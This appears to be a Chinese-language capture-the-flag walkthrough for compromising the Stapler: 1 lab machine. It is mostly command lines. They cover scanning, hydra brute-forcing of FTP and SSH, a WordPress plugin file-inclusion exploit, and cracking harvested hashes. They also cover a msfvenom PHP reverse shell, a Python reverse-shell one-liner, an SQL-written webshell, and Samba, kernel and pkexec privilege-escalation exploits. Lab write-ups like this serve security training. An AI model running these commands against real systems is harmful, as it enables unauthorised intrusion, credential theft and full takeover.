Stapler这个系列只有1个靶场环境 Stapler: 1
kali 10.100.100.100
靶机 10.100.100.101
获取靶机地址 nmap -A 10.100.100.0/24
获取靶机端口,全端口扫描 nmap -A -sV 10.100.100.101 -p-
ftp://10.100.100.101
Anonymous,无密码可以登录
note文件中获取两个用户名Elly,John,elly,harry,用户名全都加入ftp_name
hydra -L ftp_name -e nsr ftp://10.100.100.101 nsr分别是空密码、相同密码,逆转密码
爆破出elly的密码是ylle,直接ftp登录,发现是/etc/passwd文件
筛选出可以远程登录的用户 cat passwd | grep -v -E "nologin|false" | cut -d ":" -f 1 > ssh_user_name
hydra -L ssh_user_name -e nsr ssh://10.100.100.101
爆破出账号密码 SHayslett/SHayslett
ssh SHayslett@10.100.100.101,获取了初步的权限,但权限较低
枚举共享文件夹 enum4linux -a 10.100.100.101 | tee smb_result,发现有无密码登录的共享文件夹
smbclient -N //10.100.100.101/kathy
smbclient -N //10.100.100.101/tmp
http://10.100.100.101:12380 ,源代码提示有Zoe用户
nikto -host http://10.100.100.101:12380 ,获取很多路径
http://10.100.100.101:12380/blogblog ,一个wordpress博客网站
http://10.100.100.101:12380/phpmyadmin/ ,一个phpmyadmin数据库管理工具
https://10.100.100.101:12380/blogblog/wp-login.php?action=register 注册页面
https://10.100.100.101:12380/blogblog/wp-content/uploads/ 目录遍历页面
wpscan --url https://10.100.100.101:12380/blogblog/ -e ap --disable-tls-checks --plugins-detection aggressive
advanced-video-embed-embed-videos-or-playlists wordpress的这个插件存在漏洞,本地文件包含
searchsploit advanced video
www.exploit-db.com/exploits/39…
import ssl 这个是模块处添加
ssl._create_default_https_context = ssl._create_unverified_context
url = "https://10.100.100.101:12380/blogblog" # insert url to wordpress
直接运行python 39646.py,生成新文件1140321183.jpeg,这里用的还是python2
wget https://10.100.100.101:12380/blogblog/wp-content/uploads/1140321183.jpeg --no-check-certificate
cat 1140321183.jpeg 其中有数据库的账号密码root/plbkac
mysql -h 10.100.100.101 -uroot -pplbkac
select concat(user_login,':',user_pass) from wp_users; 将账号密码放入wp_user
john --wordlist=/usr/share/wordlists/rockyou.txt 获取一部分账号密码,md5加密的
hash-identifier 可以判断加密方式
https://10.100.100.101:12380/blogblog/wp-login.php john/incorrect可以登录
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.100.100.101 LPORT=4444 -f raw > shell.php
use windows/shell_reverse_tcp
Plugins-> add New ->upload Plugin 将shell.php文件上传
https://10.100.100.101:12380/blogblog/wp-content/uploads/ 访问shell.php反弹shell
如果不采用msf的办法,直接在数据库里面插入木马也可以select '' into outfile '/var/www/https/blogblog/wp-content/uploads/shell.php';
https://10.100.100.101:12380/blogblog/wp-content/uploads/shell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.100.100.101",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
kali监听 nc -vlp 4444
或者直接通过139端口获取权限root
msfconsole
search Samba
use exploit/linux/samba/is_known_pipename
set rhosts 10.100.100.101
set rport 139
run
或者
如果不走139端口获取权限,走提取
uname -a 可以知道这个版本的系统存在内核漏洞
cd ebpf_mapfd_doubleput_exploit
chmod +x compile.sh
./compile.sh
./doubleput
获得root权限
或者
gcc cve-2021-4034-poc.c -o test
chmod +x test
./test
获得root权限
或者
cat /home/*/.bash_history | grep -v exit
JKanode/thisimypassword;peter/JZQuyIN5
peter有sudo权限
sudo -l
sudo su - root
